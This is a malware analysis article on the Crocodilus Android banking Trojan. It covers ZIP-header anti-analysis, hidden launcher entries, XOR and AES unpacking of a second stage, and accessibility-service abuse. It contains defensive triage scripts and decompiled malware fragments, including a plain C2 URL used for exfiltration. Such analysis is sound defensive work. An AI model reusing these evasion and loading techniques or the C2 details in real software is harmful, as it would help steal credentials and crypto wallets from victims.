Crocodilus - A deep dive into its structure and capabilities
Jul 16, 2025
Author: Paul Viard
In this article we dive into the internals and key components of a new evolution of the Crocodilus Android banking Trojan, first reported by ThreatFabric in March 2025. The malware is equipped with a range of functionality designed to exfiltrate user credentials, cryptocurrency wallet data and system information from the victim's device. We focused our research on the Trojan's inner workings, its communication with the C2 and a few RAT commands we thought worth exploring in greater depth.
Crocodilus was discovered by ThreatFabric on March 28, 2025; the ThreatFabric team published a list of bot and RAT commands at that time. On April 14, 2025, a Zimperium article mentioned the codename "Pragma Project" and the use of native libraries in a new variant. Finally, on June 3, 2025, ThreatFabric released a new article on a Crocodilus variant with new capabilities, such as adding a phone number to the victim's contacts. Our analysis focuses on one of the latest variants, with the SHA-256 hash 6d55d90d021b0980528f56d040e78fa7b85a96f5c244e23f330f24c8e80c1cb2
Anti-Reversing technique
Malware developers tend to follow a consistent routine when building their products. They first write a core malicious component, which is later deployed onto the victim's device through another app or through dynamic code loading. Before that stage, the developer tries to conceal the APK's behaviour for as long as possible with initial anti-reversing techniques. Crocodilus is no exception: it uses a deliberately modified entry inside the APK to trip up basic tools and certain analysis mechanisms.
Password protected file
Common tools like jadx or apktool could not open the .apk at all: both stop on an "encrypted entry".
Using unzip allowed us to find the offending file, located at the root of the archive:
```shell
unzip croco.apk
# ...
  extracting: assets/stjgtuurbezeuim.png
   inflating: assets/8.mp3
[croco.apk] qyryrzr.png password:    # a password is required
```
Running 7-Zip gives a different error, which rules out a genuine password; the problem is the entry header itself:
```shell
7z x croco.apk
# ...
ERROR: Headers Error : qyryrzr.png
```
A verbose listing with unzip also shows that qyryrzr.png is the only entry with ZIP version 3 and a different OS of origin:
Before we dive deeper into the log snippet above, some background is needed. Finsky is the internal codename of the Google Play Store application on Android. It handles application installation, updates and integrity checks through Google Play Protect (also known as Verify Apps). VerifyAppsInstallTask is the component triggered during app installation; its role is to scan the APK for potential malware before or during installation. In the log snippet, an "invalid CEN header (Encrypted entry)" error is raised while inspecting the temporary file /data/app/vmdl1013385448.tmp. During installation the APK is first copied to a temporary location under /data/app/. Finsky's VerifyAppsInstallTask then parses the APK's ZIP structure, extracts specific files and computes cryptographic hashes. Because of the changes made to the ZIP structure, in particular to the qyryrzr.png entry, Finsky cannot inspect the Crocodilus APK correctly, and Verify Apps ends up flagging the package nuttiness.pamperer.cosmetics as SAFE. Since the entry cannot be extracted for analysis, we conclude that it serves no purpose other than slowing down analysts and keeping Google Play Protect from working properly. For anyone triaging APKs, the practical lesson is to treat a ZIP parsing error as a finding in its own right rather than as a corrupt download: a deliberately malformed central directory entry is enough to make both jadx and the on-device verifier give up.
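To make the trick concrete, here is an added Python example (ours, not the article's or the sample's code): it builds a small constructed archive standing in for croco.apk, sets the encryption flag (general-purpose bit 0) on a single entry named qyryrzr.png, and then shows that the standard zipfile module refuses that entry while a hand-written walk of the central directory still lists every entry with its flag word, ZIP version and host OS, which is the information unzip and 7-Zip were reporting above. All entry contents are placeholders; only the entry name qyryrzr.png is taken from the sample.

```python
import io
import struct
import zipfile

CEN_SIG, LOC_SIG, EOCD_SIG = b"PK\x01\x02", b"PK\x03\x04", b"PK\x05\x06"
FLAG_ENCRYPTED = 0x0001          # general-purpose bit 0: "entry is encrypted"
# high byte of "version made by" = host OS (APPNOTE 4.4.2); only a subset listed
HOST_OS = {0: "MS-DOS/FAT", 3: "Unix", 19: "OS X"}


def list_central_directory(data: bytes) -> list:
    """Walk the central directory by hand and return one dict per entry.
    Nothing is decompressed, so an entry flagged as encrypted is reported
    rather than rejected, which is exactly what jadx/apktool will not do."""
    eocd = data.rfind(EOCD_SIG)
    if eocd < 0:
        raise ValueError("no end-of-central-directory record")
    count, _cd_size, cd_offset = struct.unpack_from("<HII", data, eocd + 10)
    entries, pos = [], cd_offset
    for _ in range(count):
        if data[pos:pos + 4] != CEN_SIG:
            raise ValueError("bad central directory signature at offset %d" % pos)
        (made_by, _needed, flags, method, _mt, _md, _crc, csize, usize,
         nlen, xlen, clen, _disk, _iattr, _eattr, loc_off) = \
            struct.unpack_from("<HHHHHHIIIHHHHHII", data, pos + 4)
        name = data[pos + 46:pos + 46 + nlen].decode("utf-8", "replace")
        entries.append({
            "name": name,
            "cen_offset": pos,
            "local_header_offset": loc_off,
            "flags": flags,
            "encrypted": bool(flags & FLAG_ENCRYPTED),
            "zip_version": (made_by & 0xFF) / 10,      # e.g. 2.0 or 3.0
            "host_os": HOST_OS.get(made_by >> 8, "other(%d)" % (made_by >> 8)),
            "method": method,
            "compressed_size": csize,
            "size": usize,
        })
        pos += 46 + nlen + xlen + clen
    return entries


def mark_entry_encrypted(data: bytes, target: str) -> bytes:
    """Set bit 0 of the flag word for one entry, in both its central directory
    record and its local file header. The compressed bytes are untouched, so
    nothing is really encrypted; tools that honour the flag still balk."""
    buf = bytearray(data)
    for e in list_central_directory(data):
        if e["name"] != target:
            continue
        # CEN: signature(4) + version made by(2) + version needed(2) -> flags at +8
        struct.pack_into("<H", buf, e["cen_offset"] + 8, e["flags"] | FLAG_ENCRYPTED)
        loc = e["local_header_offset"]   # LOC: signature(4) + version needed(2) -> flags at +6
        if buf[loc:loc + 4] != LOC_SIG:
            raise ValueError("local header of %s is not where the CEN says" % target)
        (lflags,) = struct.unpack_from("<H", buf, loc + 6)
        struct.pack_into("<H", buf, loc + 6, lflags | FLAG_ENCRYPTED)
        return bytes(buf)
    raise KeyError(target)


def build_sample_apk() -> bytes:
    """Constructed stand-in for croco.apk; every entry body is a placeholder."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00 placeholder binary xml")
        zf.writestr("classes.dex", b"dex\n035\x00 placeholder dex")
        zf.writestr("assets/iff.json", b"placeholder for the encrypted stage-2 blob")
        zf.writestr("qyryrzr.png", b"placeholder, not a PNG")
    return mark_entry_encrypted(buf.getvalue(), "qyryrzr.png")


def flagged_entries(data: bytes) -> list:
    """Names of entries whose encryption bit is set: the triage question."""
    return [e["name"] for e in list_central_directory(data) if e["encrypted"]]


def stdlib_can_read(data: bytes, name: str) -> bool:
    """True if zipfile extracts the entry without a password."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            zf.read(name)
        return True
    except RuntimeError:     # "File 'x' is encrypted, password required for extraction"
        return False


if __name__ == "__main__":
    apk = build_sample_apk()
    for e in list_central_directory(apk):
        print("%-22s flags=0x%04x encrypted=%-5s zip=%.1f os=%s"
              % (e["name"], e["flags"], e["encrypted"], e["zip_version"], e["host_os"]))
    print("flagged:", flagged_entries(apk))
    print("zipfile reads classes.dex:", stdlib_can_read(apk, "classes.dex"))
    print("zipfile reads qyryrzr.png:", stdlib_can_read(apk, "qyryrzr.png"))
```

Point list_central_directory() at a real APK read from disk to get the same per-entry view for a sample; the flag word and "version made by" field are the two things to compare against the rest of the archive.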
Understanding the Manifest
Tools like jadx or apktool automatically convert AndroidManifest.xml into readable XML; unzip does not. The file is stored as Android binary XML (AXML), which can be parsed with tools like Androguard or axmldec.
```shell
./axmldec -o ../output_rd_AndroidManifest.xml ../AndroidManifest.xml   # convert Android binary XML into human-readable XML
grep -n -5 MAIN ../output_rd_AndroidManifest.xml                         # look for an entry point (MAIN action) with 5 lines of context
```
The AndroidManifest.xml reveals that the application's real Application class is aixx.uvoe.pxoq.Iqom. The MAIN action appears on two components:
- nuttiness.pamperer.cosmetics.uFAWABASFEFwvh, with the LEANBACK_LAUNCHER category
- the activity-alias nuttiness.pamperer.cosmetics.TrumpTayyip, with the LAUNCHER category, which targets nuttiness.pamperer.cosmetics.NAoCWwqxpyor
Interestingly, uFAWABASFEFwvh only uses the LEANBACK_LAUNCHER category, which is intended for Android TV applications. Phone launchers do not list such activities, so this entry point stays invisible in the standard application launcher while still being a MAIN entry of the app. The application explicitly allows unencrypted network traffic with android:usesCleartextTraffic="true". This permits plain HTTP, which is suspicious in itself for a modern app; Crocodilus uses it to communicate with its C2 and exfiltrate the victim's data. In addition, while the application itself is labelled "IKO", the activity NAoCWwqxpyor is labelled "Chrome" (android:label="Chrome") and likely reuses the legitimate Chrome icon to deceive users and analysts. A particularly deceptive detail is the activity-alias nuttiness.pamperer.cosmetics.TrumpTayyip. It also carries the label "Chrome" and points to NAoCWwqxpyor, but it is disabled by default (android:enabled="false"), so the fake Chrome icon is not shown right after installation and does not stand out in static analysis. The malware can enable the alias later at runtime through the PackageManager API (setComponentEnabledSetting() is the call that toggles a component), making the fake Chrome icon suddenly appear and tempting the user into launching the malicious application.
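The manifest indicators above are easy to check mechanically on the decoded XML. The script below is an added example, not part of the original analysis or of the sample: it parses a manifest with the standard xml.etree module and reports MAIN entries that carry only the LEANBACK_LAUNCHER category, disabled activity-aliases that hold a LAUNCHER entry, cleartext traffic, component labels, and services or receivers bound with the accessibility or device-admin permissions. The embedded manifest is a constructed, trimmed copy of the one reproduced in the annex; the function and report key names are ours.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
MAIN = "android.intent.action.MAIN"
LAUNCHER = "android.intent.category.LAUNCHER"
LEANBACK = "android.intent.category.LEANBACK_LAUNCHER"
ACCESSIBILITY_PERM = "android.permission.BIND_ACCESSIBILITY_SERVICE"
DEVICE_ADMIN_PERM = "android.permission.BIND_DEVICE_ADMIN"


def attr(elem, name):
    """Read an android:-namespaced attribute from a decoded manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def triage_manifest(xml_text: str) -> dict:
    """Report the launcher-hiding and privilege indicators discussed above
    for a decoded (axmldec/apktool) AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    report = {
        "package": root.get("package"),
        "application_class": attr(app, "name"),
        "application_label": attr(app, "label"),
        "cleartext_traffic": attr(app, "usesCleartextTraffic") == "true",
        "leanback_only_main": [],         # MAIN entries that phone launchers never show
        "disabled_launcher_aliases": [],  # (alias, target, label): icon switched on later
        "accessibility_services": [],
        "device_admin_receivers": [],
        "labels": {},                     # component -> label, to spot "Chrome"-style lures
    }
    for comp in app:
        name = attr(comp, "name")
        if name is None:
            continue
        if attr(comp, "label"):
            report["labels"][name] = attr(comp, "label")
        # actions and categories are scoped per intent-filter, so evaluate each filter alone
        for flt in comp.findall("intent-filter"):
            actions = {attr(a, "name") for a in flt.findall("action")}
            cats = {attr(c, "name") for c in flt.findall("category")}
            if MAIN not in actions:
                continue
            if LEANBACK in cats and LAUNCHER not in cats:
                report["leanback_only_main"].append(name)
            if (comp.tag == "activity-alias" and LAUNCHER in cats
                    and attr(comp, "enabled") == "false"):
                report["disabled_launcher_aliases"].append(
                    (name, attr(comp, "targetActivity"), attr(comp, "label")))
        if comp.tag == "service" and attr(comp, "permission") == ACCESSIBILITY_PERM:
            report["accessibility_services"].append(name)
        if comp.tag == "receiver" and attr(comp, "permission") == DEVICE_ADMIN_PERM:
            report["device_admin_receivers"].append(name)
    return report


# Constructed input: a trimmed copy of the decoded manifest reproduced in the annex.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="nuttiness.pamperer.cosmetics">
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="IKO" android:name="aixx.uvoe.pxoq.Iqom"
               android:usesCleartextTraffic="true">
    <activity android:name="nuttiness.pamperer.cosmetics.uFAWABASFEFwvh" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LEANBACK_LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:label="IKO" android:name="nuttiness.pamperer.cosmetics.NJWLtIfaF.nTsZKYXKEBeFL"
              android:permission="android.permission.BIND_DEVICE_ADMIN" android:exported="true"/>
    <service android:label="IKO" android:name="nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF"
             android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE" android:exported="true">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
    </service>
    <activity android:label="Chrome" android:name="nuttiness.pamperer.cosmetics.NAoCWwqxpyor"
              android:exported="true"/>
    <activity-alias android:label="Chrome" android:name="nuttiness.pamperer.cosmetics.TrumpTayyip"
                    android:enabled="false" android:exported="true"
                    android:targetActivity="nuttiness.pamperer.cosmetics.NAoCWwqxpyor">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity-alias>
  </application>
</manifest>
"""


if __name__ == "__main__":
    import json
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST), indent=2))
```

Run it on the output of axmldec or apktool rather than on the binary manifest; for a real sample, an alias that is disabled in the manifest but shows an icon on the device is the runtime confirmation of the PackageManager trick described above.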
Stage 1 - Packer Behavior and Dynamic Loading
The initial stage of the malware functions as a packer, a module responsible for unpacking, decrypting, and loading the core malicious payload.
The packer loads a fake .json file that, upon inspection, is not valid JSON at all. Instead it contains binary data: an encrypted DEX file, the second-stage payload.
We opened classes.dex in jadx-gui to read the Java code and get a better understanding of the malware. Several classes and packages referenced by the manifest, such as nuttiness.pamperer.cosmetics, are absent from the listing in jadx-gui, which points to dynamic code loading or resolution.
Dynamic Code Loading
The malware calls open() on the result of getAssets(), the method normally used to access files bundled in the APK's assets folder. Here the call loads a file at runtime whose name is passed in as a parameter. This behaviour is implemented in the function baggyvagrantly(), which reads the file named by its second argument and returns a byte array. The pattern strongly suggests that the malware loads an encrypted payload from the assets folder; by doing so, the developer avoids placing malicious code directly in the first stage, potentially evading static analysis and signature-based detection. Here is the relevant code:
The second argument, String filename, is produced by a dedicated function, monopolysinger, called from exquisitereborn (the parent function of baggyvagrantly). We describe it in the Multiple Obfuscations part below. The byte array is then handed to the function oozyoutsource in the class Outlastunafraid.
To understand how the filename is retrieved by monopolysinger and how the byte array is passed along to be loaded at runtime, we need to get past some obfuscation techniques.
Multiple Obfuscations
We are now certain that dynamically loaded code is present. In this part we look at how the file is read and how its content is passed through multiple functions to make analysis harder.
Strings
The String filename parameter used by baggyvagrantly is produced by the monopolysinger() function, which applies a simple XOR to the byte array [124, 115, 115, 59, 127, 102, 122, 123] with the key 21. After decryption, the resulting filename is "iff.json", a raw binary file disguised with a .json extension.
The key is declared as a private static final byte <random_word>. A regex search in jadx-gui confirmed that 21 is the key for every encrypted string.
We used another regex to find every byte array in the code. It matches sequences like {12, 45, 78} as well as arrays containing Byte.MAX_VALUE (jadx's rendering of the byte 127). The pattern is used by a Python script to de-obfuscate the strings. The regex used is:
Here is a list of decrypted strings found inside the malware:
[iff.json, mClassLoader, AES/CBC/PKCS5Padding, mLoadedApk, gullyclosure.dex] The python script can be found in the Annexes.
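An added example of the de-obfuscation step, written for this article and not taken from its annex script: a regex that matches jadx's {..} byte-array literals (including Byte.MAX_VALUE), extraction of the key from the `private static final byte` declaration, and XOR decoding with a printable-text filter that drops arrays which are not strings at all. The Java snippet it runs on is constructed; the class and field names in it are invented, and its two encoded arrays decode to the "iff.json" and "gullyclosure.dex" strings listed above.

```python
import re

# jadx prints the byte 127 as Byte.MAX_VALUE and -128 as Byte.MIN_VALUE
TOKEN = r"(?:-?\d{1,3}|Byte\.MAX_VALUE|Byte\.MIN_VALUE)"
ARRAY_RE = re.compile(r"\{\s*(" + TOKEN + r"(?:\s*,\s*" + TOKEN + r")*)\s*\}")
KEY_RE = re.compile(r"private\s+static\s+final\s+byte\s+\w+\s*=\s*(-?\d+)\s*;")
SPECIAL = {"Byte.MAX_VALUE": 127, "Byte.MIN_VALUE": -128}


def parse_byte_array(text: str) -> bytes:
    """'124, Byte.MAX_VALUE, -1' -> b'|\\x7f\\xff' (Java bytes are signed)."""
    vals = []
    for tok in (t.strip() for t in text.split(",")):
        v = SPECIAL.get(tok)
        if v is None:
            v = int(tok)
        vals.append(v & 0xFF)
    return bytes(vals)


def xor_decode(values, key: int) -> str:
    """Single-byte XOR of every element with the key."""
    return bytes((v & 0xFF) ^ (key & 0xFF) for v in values).decode("latin-1")


def find_xor_key(java_source: str):
    """The key as jadx shows it: 'private static final byte <name> = 21;'."""
    m = KEY_RE.search(java_source)
    return int(m.group(1)) & 0xFF if m else None


def decode_java_source(java_source: str, key=None) -> list:
    """Every {..} byte array in the decompiled source, XOR-decoded with the key.
    Arrays that do not decode to printable ASCII (loop tables, counters) are
    dropped, so the result is the string list an analyst wants."""
    if key is None:
        key = find_xor_key(java_source)
        if key is None:
            raise ValueError("no 'private static final byte' key found")
    out = []
    for m in ARRAY_RE.finditer(java_source):
        s = xor_decode(parse_byte_array(m.group(1)), key)
        if s and all(32 <= ord(c) < 127 for c in s):
            out.append(s)
    return out


# Constructed jadx-style snippet; the identifiers are invented, the key and
# the first array are the ones described above.
SAMPLE_JAVA = """
public final class Exquisitereborn {
    private static final byte hjsdgfkw = 21;

    static String monopolysinger() {
        return decode(new byte[]{124, 115, 115, 59, Byte.MAX_VALUE, 102, 122, 123});
    }

    static String dexName() {
        return decode(new byte[]{114, 96, 121, 121, 108, 118, 121, 122, 102, 96, 103, 112, 59, 113, 112, 109});
    }

    static final int[] counters = {1, 2, 3};   // not a string: filtered out
}
"""


if __name__ == "__main__":
    print("key:", find_xor_key(SAMPLE_JAVA))
    print("strings:", decode_java_source(SAMPLE_JAVA))
```

On a real jadx export, feed every .java file through decode_java_source(); if find_xor_key() returns None for a sample, pass the key explicitly.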
Control Flow Obfuscation
To understand how the content of iff.json (the byte array) is used, we followed the execution flow after exquisitereborn, starting from oozyoutsource and passing through several wrapper functions before reaching the main_logic function. These wrappers only pass control or data on to the principal code segment and serve as an obfuscation layer, a well-known technique to confuse analysts and hinder static analysis.
To confuse the analyst, the byte array byte[] bArr is handed through several functions and classes before ending up in main_logic, where it is decrypted. main_logic runs an AES decryption routine and writes a new DEX file to the device; this routine is explained in the following section.
AES Decryption
After bypassing the control flow obfuscation, the final function main_logic is accessed. main_logic, renamed from its obfuscated name favorablechevron, performs AES decryption on the contents of iff.json and writes the result to a new file named gullyclosure.dex.
Inside setup_AES_decrypt(), a 16-byte key is taken from bytes 32 to 48 of iff_json_bytes, a 16-byte IV from bytes 48 to 64, and the ciphertext from byte 72 to the end of the array. The ciphertext is then decrypted with "AES/CBC/PKCS5Padding" (Java's name for AES-CBC with PKCS#7 padding on 16-byte blocks). Since the key and IV are carried in the file itself, there is no secret in this scheme: it is obfuscation, and anyone with the APK can recover the second stage offline.
"after receiving the raw data, the data must first be grouped into clusters. If the length of a cluster does not meet the cluster conditions, it is necessary to supplement it, finally forming a series of clusters that the encryption and decryption algorithm processes group by group."
Decrypting the file in CyberChef confirms our assumption about the true nature of iff.json: the first bytes of the output are the DEX signature:
A python script can be found in the Annexes to automatically extract the second-stage dex file.
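The following Python script is an added example of the extraction, not the annex script itself: it applies the offsets given above (key at 32..48, IV at 48..64, ciphertext from 72), decrypts with AES-128-CBC and PKCS#7 unpadding (what Java calls PKCS5Padding for AES), and then checks the output the way the CyberChef step does, by looking at the DEX magic, plus the file_size and Adler-32 checksum fields of the DEX header. It assumes the `cryptography` package. The container and DEX produced by the two build_fake_* helpers are constructed fixtures, not Crocodilus data; bytes 0..32 and 64..72 of iff.json are not described in the analysis and are left opaque.

```python
import struct
import zlib

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

# Layout of iff.json as described above: 16-byte key at 32..48, 16-byte IV at
# 48..64, ciphertext from 72 to the end. Bytes 0..32 and 64..72 are not
# described in the analysis and are treated as opaque here.
KEY_SLICE = slice(32, 48)
IV_SLICE = slice(48, 64)
CT_START = 72
DEX_HEADER_SIZE = 0x70


def decrypt_stage2(container: bytes) -> bytes:
    """AES/CBC/PKCS5Padding as Java names it: AES-128-CBC with PKCS#7 padding."""
    key, iv, ct = container[KEY_SLICE], container[IV_SLICE], container[CT_START:]
    if len(key) != 16 or len(iv) != 16 or not ct or len(ct) % 16:
        raise ValueError("container too short or ciphertext not a multiple of 16 bytes")
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ct) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()   # ValueError on bad padding (wrong key/offsets)


def inspect_dex(blob: bytes) -> dict:
    """Cheap sanity checks before handing the output to jadx: the 'dex\\n0NN\\0'
    magic, file_size at offset 32, and the Adler-32 checksum at offset 8,
    which covers everything from offset 12 to the end of the file."""
    if len(blob) < DEX_HEADER_SIZE or blob[:4] != b"dex\n" or blob[7:8] != b"\x00":
        return {"is_dex": False}
    checksum, = struct.unpack_from("<I", blob, 8)
    file_size, = struct.unpack_from("<I", blob, 32)
    return {
        "is_dex": True,
        "version": blob[4:7].decode("ascii", "replace"),
        "file_size": file_size,
        "size_ok": file_size == len(blob),
        "checksum_ok": (zlib.adler32(blob[12:]) & 0xFFFFFFFF) == checksum,
    }


def extract_stage2(container: bytes) -> bytes:
    """Decrypt and refuse anything that does not look like a well-formed DEX."""
    dex = decrypt_stage2(container)
    info = inspect_dex(dex)
    if not info["is_dex"] or not info["checksum_ok"]:
        raise ValueError("decrypted payload is not a well-formed DEX: %r" % info)
    return dex


# --- constructed fixtures (not real Crocodilus data) ------------------------

def build_fake_dex(version: bytes = b"035") -> bytes:
    """A header-only DEX (0x70 bytes) with consistent file_size and checksum."""
    tail = bytearray(DEX_HEADER_SIZE - 12)                   # signature + rest of the header
    struct.pack_into("<I", tail, 32 - 12, DEX_HEADER_SIZE)   # file_size
    struct.pack_into("<I", tail, 36 - 12, DEX_HEADER_SIZE)   # header_size
    struct.pack_into("<I", tail, 40 - 12, 0x12345678)        # endian_tag
    checksum = zlib.adler32(bytes(tail)) & 0xFFFFFFFF
    return b"dex\n" + version + b"\x00" + struct.pack("<I", checksum) + bytes(tail)


def build_fake_container(payload: bytes, key: bytes, iv: bytes) -> bytes:
    """Wrap a payload in the iff.json layout using the offsets above."""
    pad = padding.PKCS7(128).padder()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    ct = enc.update(pad.update(payload) + pad.finalize()) + enc.finalize()
    return b"\x00" * 32 + key + iv + b"\x00" * 8 + ct


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:                     # real use: iff.json -> gullyclosure.dex
        with open(sys.argv[1], "rb") as f:
            dex = extract_stage2(f.read())
        with open(sys.argv[2], "wb") as f:
            f.write(dex)
        print(inspect_dex(dex))
    else:                                      # self-check on constructed data
        key, iv = bytes(range(16)), bytes(range(16, 32))
        c = build_fake_container(build_fake_dex(), key, iv)
        print(inspect_dex(extract_stage2(c)))
```

A padding error from decrypt_stage2() on a real sample almost always means the offsets moved in a newer build; a clean decryption whose checksum does not verify means the DEX was tampered with or only partially recovered, and jadx will usually still open it, so check before trusting it.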
Dynamic Class Loading & Self Deletion
Now that we have reviewed the steps that produce a clean DEX file, this section looks at how stage 2 is loaded at runtime. Searching jadx-gui for two strings from the decrypted list that had not been used so far, "mLoadedApk" and "mClassLoader", leads to wrp_class_loader(): reflective Java code that replaces the app's default ClassLoader at runtime with a different one (see the next paragraph).
The parent function riptideyapping creates a new PathClassLoader to load the DEX file gullyclosure.dex dynamically. Once the DEX is loaded, the function deletes it from disk, so the decrypted stage 2 exists only in memory. For an analyst this means the file is best recovered by decrypting iff.json offline (as the annex script does) or by hooking the loader, rather than by looking for gullyclosure.dex on the device.
Having established how iff.json is turned into a DEX file and how that file is loaded into memory, we wanted to understand the application's life cycle and find its entry points.
Entry points
By backtracking through the execution flow, we pinpointed the entry points that trigger the two functions above, exquisitereborn and riptideyapping. In the class Tricepsdial of the package loqlhajt.budgetsepia.possiblyanime, two important methods are present: attachBaseContext and onCreate. attachBaseContext reads iff.json from the assets folder and decrypts it into a DEX file; onCreate then loads that DEX dynamically and deletes it from disk.
```java
@Override // android.content.ContextWrapper
protected void attachBaseContext(Context context) {
    super.attachBaseContext(context);
    try {
        wrp_to_exquisitereborn(context); // loads iff.json and writes it to gullyclosure.dex
    } catch (Exception e) {
    }
}

@Override // android.app.Application
public void onCreate() {
    super.onCreate();
    try {
        wrp_to_riptideyapping(this); // loads gullyclosure.dex / stage 2
    } catch (Exception e) {
        throw new RuntimeException("Error in onCreate", e);
    }
}
```
According to the documentation of Application.onCreate(), the Application object's onCreate() is called before any activity, service or receiver (content providers excepted) is created. attachBaseContext() runs even earlier, when the Application object is attached to its context, as a Medium post on the Application life cycle also points out. To summarise: attachBaseContext executes first and calls exquisitereborn to write the new DEX file; onCreate then calls riptideyapping to load gullyclosure.dex dynamically.
In the AndroidManifest.xml, however, the application's name is "aixx.uvoe.pxoq.Iqom". Inside this class only one noteworthy method is present, attachBaseContext, and it redirects execution to the class VzxfOopr:
```java
/* Class aixx.uvoe.pxoq.Iqom */
protected void attachBaseContext(Context context) {
    super.attachBaseContext(context);
    try {
        VzxfOopr.launchEntryPoint(context);
        /* ... */
    }
}
```
Within VzxfOopr, the launchEntryPoint method decodes an obfuscated string that names the real entry point identified earlier, the class loqlhajt.budgetsepia.possiblyanime.Tricepsdial.
Finally, the last line invokes the attachBaseContext method of that Tricepsdial class. This execution chain is clearly designed to conceal the packer's true entry point for as long as possible; as shown here, it can still be uncovered by carefully backtracking through the execution flow.
Stage 2
The second stage of the malware is a RAT (Remote Access Trojan). Its primary goals are to get the accessibility service enabled, to communicate with the C2 server and to extract confidential data from the device. Using a Python script (available under "stage two extraction" in the Annexes), we decrypted iff.json into a new DEX file, gullyclosure.dex. This time the nuttiness.pamperer.cosmetics package is present, and the launcher entry declared in the manifest, the class uFAWABASFEFwvh, is found in it.
```java
public void onCreate(Bundle bundle) {
    super.onCreate(bundle);
    /* ... */
    this.WyeYYVjhhMdbqG.toLog(">>>START<<<", "<< START CROCODILE BOT 2025 >> **** YOU LUCAS STEFANKO ");
    finish();
}
```
Obfuscation
This malware uses the class nuttiness.pamperer.cosmetics.xaWvaIufkin.sIbsaRKoVR to store all the strings it needs inside arbitrarily named variables. Within this class, four types of content can be found: plaintext values, Base64-encoded values, RAT command strings and empty variables. Here's the relevant code:
```java
public static String QureAhrrkvrWdYVcIt = "Chrome 2.0.4 Update";
/* renamed from: hiiTkSjilhrg */
public static String c2_url = "http://rentvillcr.homes";
private static final Map<String, String> xDtdOHuUatEIiIh;
public String GRMeEoEOOJSiCc;
/* renamed from: PEZeMAQPvizETyOfq */
public String[] android_version;
public String QbaaRTdTCPYDknVe;
public final String TTYvIcxiTOwabQ;
public String UOtETXdmbozp;
public String dfWLXNNCwtKiQb;
public String flkJjpkKyxMv;
/* ... */
public String iKWgdxbvoimhekUY = "O6155FI2SXZ";          // RAT command string
public String ZpswOiujEheim = "TCL9CLSKDLX12";           // RAT command string
public String OGETrbPXJNthc = base64decode("LCJleGl0IjoiIg==");      // decodes to: ,"exit":""
public String lbXSkjppXRZdyV = base64decode("LCJleGl0IjoidHJ1ZSI=");  // decodes to: ,"exit":"true"
public String pGUkvXZvaYguSmuye = "852147414735";
public String jjYHMEVwGSNSlwc = "864512532655";
public String NknlBDFjiriGaDfQ = "154856895422";
```
SharedPreferences
SharedPreferences are used to store several values for the malware and to keep them across reboots. For instance, Crocodilus stores the C2 URL, stolen 2FA codes and cryptocurrency keys there. According to the Android documentation:
"SharedPreferences object points to a file containing key-value pairs and provides simple methods to read and write them."
The following function is used to set a specific key-value pair inside FilesSettings:
A non-exhaustive list of the settings used can be found in the annexes. The SharedPreferences are important for the malware as we will see in the Cryptocurrency Wallets and the Interesting RAT commands parts.
Accessibility Service
To be fully operational, Crocodilus needs the user to enable its accessibility service. This is one of the most powerful capabilities an app can be granted in the user's environment. According to the Android documentation:
"An _accessibility service_ is an app that enhances the user interface to assist users with disabilities or who might temporarily be unable to fully interact with a device."
The malware asks the user for the accessibility permission through an Android WebView. The HTML content of the WebView is decoded from a Base64 variable:
We decoded the HTML and the JavaScript, whose purpose is to get the accessibility service enabled for the app.
```javascript
// A function to open the accessibility settings from the Android WebView
function openSettings() {
    try {
        if (typeof Android !== 'undefined' && Android.openAccessibilitySettings) {
            android.openAccessibilitySettings();
        } else {
            alert('This feature is only available in the Android app.');
        }
    } catch (e) {
        console.error('Error opening accessibility settings', e);
    }
}
```
The WebView tries to fool the user by showing a fake Chrome page.
Once the victim has enabled the accessibility service, the malware can perform any user action on the device: opening settings, reading the text on screen, and so on. The class nuttiness.pamperer.cosmetics.iRhkqgbpsuK.dNCGxurzQUjoF extends AccessibilityService and is responsible for executing the RAT commands. By overriding onAccessibilityEvent() from android.accessibilityservice.AccessibilityService, the malware performs different actions depending on the eventType value. These event types correspond to actions generated by the user or by the malware itself.
Being a RAT, the malware relies on active communication with its server, so being able to understand and extract what is exchanged between the device and the C2 helps us understand Crocodilus' behaviour. As the DEX file is heavily obfuscated, we focused on its communication with the C2. The C2 URL can be found in the nuttiness.pamperer.cosmetics.xaWvaIufkin.sIbsaRKoVR class mentioned in the Obfuscation section above.
Other occurrences of c2_url led us to the encryption routine used for the communication. All inputs and outputs are encrypted with AES combined with string manipulations, and the result is sent to http[:]//rentvillcr[.]homes/Pragmatical.
The AES encryption is followed by several string manipulations and Base64 encoding. Listing every transformation applied to the content let us build a script to decrypt Crocodilus requests. The cipher is AES/CBC/PKCS5Padding with a randomly generated 16-byte IV per message. A fresh IV is the right way to use CBC, but because the script can be built from the sample alone, this layer protects the traffic only against casual inspection, not against anyone holding the APK.
The main mission of Crocodilus is to steal cryptocurrency-related data from the device. The malware specifically targets two critical components of cryptocurrency wallets, private keys and seed phrases, and extracts them with a distinct regular expression for each. It then stores these sensitive values in the app's SharedPreferences under two distinct keys. The names of the targeted applications are received dynamically from the C2 server; however, at least three specific applications are consistently targeted:
